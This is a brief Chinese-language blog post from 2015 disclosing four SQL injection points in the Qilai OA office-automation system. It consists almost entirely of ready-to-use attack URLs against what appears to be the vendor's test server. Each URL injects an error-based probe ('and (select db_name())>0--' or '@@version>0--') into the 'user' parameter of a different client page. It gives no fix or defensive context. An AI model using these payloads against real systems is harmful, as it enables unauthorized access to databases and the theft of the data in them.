IT博客汇 | 启莱OA系统sql注入4处

启莱OA系统sql注入4处

没穿底裤发表于 2015-10-03 13:27:08

注入一
访问
http://test.oawin.net:5656/client/treelist.aspx?user=’ and (select db_name())>0–&pwd=1

注入二
访问
http://test.oawin.net:5656/client/messageurl.aspx?user=’ and (select db_name())>0–&pwd=1

注入三
访问
http://test.oawin.net:5656/client/GetUser.aspx?user=’ and @@version>0–

注入四
访问
http://test.oawin.net:5656/client/CloseMsg.aspx?user=’ and @@version>0–&

pwd=a